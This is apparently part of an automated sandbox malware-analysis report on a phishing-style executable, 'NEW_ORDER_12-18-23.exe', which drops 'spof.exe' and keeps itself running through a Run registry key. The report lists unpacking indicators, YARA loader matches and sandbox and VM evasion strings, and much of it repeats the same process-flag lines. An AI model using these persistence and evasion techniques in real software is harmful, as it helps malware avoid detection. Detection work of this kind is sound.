                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: NEW_ORDER_12-18-23.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: NEW_ORDER_12-18-23.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a100f1b20.2.raw.unpack, IndexerModelWatcher.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: NEW_ORDER_12-18-23.exe, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                      Source: spof.exe.0.dr, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a7c890000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a7c890000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a7c890000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a7c890000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a7c890000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11eabbf0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11eabbf0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11eabbf0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11eabbf0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11eabbf0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c5a2b28.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225b9c2ab8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c52aab8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225b99aa80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c52aab8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e11790.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b0a9a7ab0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a7c850000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a00219f98.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a00219f98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11df6748.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225ba12af0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c552af0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b0a9a7ab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225b99aa80.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a100c5e90.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11da6710.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C5A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1903558795.000002225BA12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A11CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C44A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753742623.0000024A7C850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A10091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1903558795.000002225B8BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B878F2D push edi; retf 0_2_00007FFD9B878F30
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 11_2_00007FFD9BAB8F2D push edi; retf 11_2_00007FFD9BAB8F30
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 25_2_00007FFD9BAA8F2D push edi; retf 25_2_00007FFD9BAA8F30
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeFile created: C:\Users\user\AppData\Roaming\spof.exeJump to dropped file
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spofJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spofJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe TID: 7312Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exe TID: 7584Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exe TID: 7536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exe TID: 7980Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1752352645.0000024A7A100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: spof.exe, 0000000B.00000002.1900839587.0000022247FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                      Source: spof.exe, 00000019.00000002.1964844498.0000012B08BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
